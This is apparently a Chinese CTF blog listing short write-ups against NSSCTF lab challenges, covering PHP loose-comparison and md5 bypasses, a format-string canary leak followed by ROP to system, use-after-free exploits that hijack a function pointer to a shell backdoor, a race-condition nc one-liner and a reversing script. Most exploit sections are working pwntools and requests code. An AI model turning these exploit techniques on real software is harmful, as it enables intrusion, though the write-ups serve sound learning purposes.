wubba lubba dub dub.
post @ 2023-07-03

php弱类型绕过

1
2
3
4
5
6
7
8
9
10
'' == 0 == false
'123' == 123
'abc' == 0
'123a' == 123
'0x01' == 1
'0e12346789' == '0e987654321' (都解释为0
[false] == [0] == [NULL] == ['']
NULL == false == 0
true == 1
true == "***" (true和任意字符串弱相等)

例题

secretjson
页面源码

<?php
include_once 'secret.php'; // $flag  $key
if (isset($_POST['message'])) {
    $message = json_decode($_POST['message']);
    if ($message->key == $key) {
        echo $flag;
    } 
    else {
        echo "fail";
    }
}
else show_source(__FILE__);
?>

post –> message={“key”:true} 即可获取flag

Read More
post @ 2023-06-28

题目链接
网页看到源代码,可知需要post id=wllmNB; get json={x=wllm}

1
2
3
4
5
6
7
8
<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>
  1. HackBar

    img

  2. python

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import requests

    post_data = {"id": "wllmNB"}
    get_data = {"json": '{"x":"wllm"}'}

    # params 为get数据,data为post数据
    response = requests.post("http://node2.anna.nssctf.cn:28110/", data=post_data, params=get_data)

    print(response.text)
Read More
post @ 2023-06-21

题目链接
页面内容 明显要求name和password不同但md5哈希相同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php 
highlight_file(__FILE__);
include 'flag2.php';

if (isset($_GET['name']) && isset($_POST['password'])){
$name = $_GET['name'];
$password = $_POST['password'];
if ($name != $password && md5($name) == md5($password)){
echo $flag;
}
else {
echo "wrong!";
}

}
else {
echo 'wrong!';
}
?>

1.寻找哈希碰撞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests

get_data = {
"name": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
b'\xfe\x34\x04\xcf\x03\x65\x9e\x70\x4f\x85\x34\xc0\x0f\xfb'
b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
b'\x15\x5c\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
post_data = {
"password": b'\x0e\x30\x65\x61\x55\x9a\xa7\x87\xd0\x0b\xc6\xf7\x0b\xbd'
b'\xfe\x34\x04\xcf\x03\x65\x9e\x74\x4f\x85\x34\xc0\x0f\xfb'
b'\x65\x9c\x4c\x87\x40\xcc\x94\x2f\xeb\x2d\xa1\x15\xa3\xf4'
b'\x15\xdc\xbb\x86\x07\x49\x73\x86\x65\x6d\x7d\x1f\x34\xa4'
b'\x20\x59\xd7\x8f\x5a\x8d\xd1\xef'}
response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
print(response.text)

2.传数组,md5处理数组都返回null

1
2
3
4
5
6
import requests

get_data = { "name[]": 1}
post_data = { "password[]": 2}
response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
print(response.text)

3.都传0e开头的数字,传参时默认变为0,md5结果相同且==为弱比较

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import requests

get_data = { "name": "s878926199a"}
post_data = { "password": "s214587387a"}
response = requests.post("http://node2.anna.nssctf.cn:28070/", data=post_data, params=get_data)
print(response.text)

'''
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708
0e462097431906509019562988736854
314282422
'''
Read More
post @ 2023-06-20

0x1 分析

  • 保护全开
  • gets —> printf —> gets
  • 明显栈溢出,首先想到填满然后泄露canary,但是gets会自动将\n替换为\0
  • 应用格式化字符串漏洞泄露canary和随机化基地址
  • system函数已在plt中
  • 有cat flag字符串

img

0x2 exp

  1. 第一个gets,格式化字符串泄露canary和base
  2. 第二个gets,ROP

img

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
import sys
pty = process.PTY
context(os='linux', log_level='debug')

mode = sys.argv[1] if len(sys.argv) > 1 else ''
if mode == 'r':
proc = remote("node4.anna.nssctf.cn", 28372)
else:
proc = process("./bin", stdin=pty, stdout=pty)

belf = ELF("./bin")


def s(x): proc.send(x)
def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(x=0xfffffff): return proc.recv(x)
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()
def ga(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))

gscript = '''
b main
fin
fin
fin
fin
ni 80
'''
if mode == 'd':
gdb.attach(proc, gdbscript=gscript)

# 格式化字符串泄露 canary和随机化base
sla(b'name? ', b'%p '*0x13)

ru(b', ')
t = ru(b'!\n').decode().split(' ')
print(t)

canary = int(t[-4], 16)
base = int(t[-2], 16)-0x146f
catflag_addr = base+0x2004
system_plt = base+belf.plt['system']
rdi_ret = base+0x00000000000014e3
ret = base+0x000000000000101a


ls("canary: "+hex(canary))
ls("catflag_addr: "+hex(catflag_addr))

# ROP
sl(b'h'*0x38 + p64(canary)+b'h'*8+p64(ret) +
p64(rdi_ret)+p64(catflag_addr)+p64(system_plt))

pi()
pause()

Read More
post @ 2023-06-19

相关资源

0x1 分析

  • PIE未开
  • free完没有置空,存在uaf漏洞
  • 存在后门函数NICO(char* command),执行system(command);
  • page为结构体指针数组 结构体组成:char str[4] 和 void* func (各为32位)
  • show(0) 会执行 (page[0]->func)(page[0]->str)

0x2 思路

  • create page[0]
  • del page[0]
  • create page[1] (此时page[0]和page[1]相同,指向相同空间)
  • edit page[1] —-> ‘sh\0\0’+p32(NICO) (即修改了page[0])
  • show(0)

0x3 exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
from pwn import *
pty = process.PTY
context(os='linux', arch='i386', log_level='debug')

proc = process("./bin", stdin=pty, stdout=pty)
# proc = remote("node4.anna.nssctf.cn", 28035)
belf = ELF("./bin")

def s(x): proc.send(x)
def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(): return proc.recv()
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()
def ga(): return u64(ru(b'\x7f')[-6:].ljust(8, b'\x00'))

def add():
sla(b':', b'1')

def dlt(idx):
sla(b':', b'3')
sla(b'page\n', str(idx).encode())

def shw(idx):
sla(b':', b'4')
sla(b'page\n', str(idx).encode())

def edt(idx, con):
sla(b':', b'2')
sla(b'page\n', str(idx).encode())
sla(b'strings\n', con)

gscript = '''
b main
b create
b del
b show
b edit
'''
# gdb.attach(proc, gdbscript=gscript)

NICO_addr = 0x08048642

add()
dlt(0)
add()
edt(1, b'sh\x00\x00'+p32(NICO_addr))
shw(0)

pi()
pause()

Read More
post @ 2023-06-17

相关资源

0x1 分析

  • Shift+F12 查看字符串,追寻到 “you are right.”的使用处, 发现核心处理代码

img

img

img

  • 进入查看发现35行 sub_140011339 将key置为[2233,4455,6677,8899]

  • 36行 sub_140011145 将input复制到v9, 无用

  • 37行 sub_1400112B7 利用input和key执行核心加密算法,且可逆向

    img

  • 38行 sub_140011352 检查结果

    img

0x2 逆向脚本

逆写算法就可以,注意循环下标也要逆序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <limits.h>

int main() {
unsigned int a1[]= {0x1A800BDA, 0xF7A6219B, 0x491811D8, 0xF2013328, 0x156C365B, 0x3C6EAAD8, 0x84D4BF28, 0xF11A7EE7, 0x3313B252, 0xDD9FE279 };
int a2[]={2233,4455,6677,8899};
int v3,v5,v6;
for (int i = 8; i >= 0; i-- ) {
v5 = 0;
v6 = 256256256 * i;
v3 = i + 1;
for(int j=0; j<=0x20; j++) {
v6+=256256256;
}
do {
++v5;
v6 -= 256256256;
a1[v3] -= (v6 + a2[(v6 >> 11) & 3]) ^ (a1[i] + ((a1[i] >> 5) ^ (16 * a1[i])));
a1[i] -= v6 ^ (a1[v3] + ((a1[v3] >> 5) ^ (16 * a1[v3]))) ^ (v6 + a2[v6 & 3]);
} while ( v5 <= 0x20 );
}
for(int i=0;i<10;i++){
printf("%#x ",a1[i]);
}
return 0;
}

img

HZCTF{hzCtf_94_re666fingcry5641qq}

Read More
post @ 2023-06-15

相关资源

0x1 分析

img

Read More
post @ 2023-06-13

相关资源

0x1 分析

img
img
sell的时候使用pthread_create,其中有usleep,只要发送速度足够快,可以卖出两次

0x2 exp

1
2
3
4
5
echo -e '3\n0\n3\n0\n2\n1\n1\n' | nc node3.anna.nssctf.cn 28736
# sell pen
# sell pen
# buy flag
# show
Read More
post @ 2023-06-13

相关资源

exp

查看server.py代码逻辑, 简单替换运算

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
context.log_level = 'debug'

proc = remote("node4.anna.nssctf.cn", 28793)

def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(): return proc.recv()
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()

d = {'//': '*', 'x': '-', '-': '+', '%': '//', '+': '%'}
sla(b'start...', b'')
for i in range(301):
ru(b'Round')
ru(b'\n')
epr = ru(b'= ')[:-3].decode().split(' ') #空格分隔
epr[1] = d[epr[1]] # 替换运算符
epr = ''.join(epr)
print(epr)
sl(str(eval(epr)).encode())
Read More
post @ 2023-06-12

相关资源

use after free

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
from pwn import *
from ctypes import *
context.log_level = 'debug'
pty = process.PTY

proc = process("./girlfriend", stdin=pty, stdout=pty)
# proc = remote("node2.anna.nssctf.cn", 28783)
belf = ELF("./girlfriend")
libc = ELF("/usr/ctf/pwn/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so")

def sl(x): return proc.sendline(x)
def sd(x): return proc.send(x)
def sla(x, y): return proc.sendlineafter(x, y)
def sa(x, y): return proc.sendafter(x, y)
def ru(x): return proc.recvuntil(x)
def rc(): return proc.recv()
def rl(): return proc.recvline()
def li(con): return log.info(con)
def ls(con): return log.success(con)
def pi(): return proc.interactive()
def pcls(): return proc.close()

def add(size, con):
sla(b'choice :', b'1')
sla(b'size is :', str(size).encode())
sa(b'name is :', con)

def dlt(idx):
sla(b'choice :', b'2')
sla(b'Index :', str(idx).encode())

def shw(idx):
sla(b'choice :', b'3')
sla(b'Index :', str(idx).encode())

gscript = '''
b add_girlfriend
b del_girlfriend
hook-bins
memory watch 0x00000000006020A0 6 qword
'''
# gdb.attach(proc, gdbscript=gscript)

backdoor = 0x0000000000400B9C

add(0x10, p64(backdoor)) #add时先分配 struc_ptr 再分配 name_ptr
add(0x20, p64(backdoor))
dlt(0) # delete的时候先free name_ptr 再free struc_ptr
dlt(1) # 所以name_ptr 先进入fastbin
# 两次delete结束后fastbin:
# [0x20] chunk3(struc_ptr) -> chunk1(struc_ptr) -> chunk2(name_ptr)
# [0x30] chunk4(name_ptr)
# 再次add, chunk1 会被当做 name_ptr
# 这样就可以复写它的 func_ptr, 再执行show,就执行了后门函数
add(0x10, p64(backdoor))
shw(0)
pi()
Read More
⬆︎TOP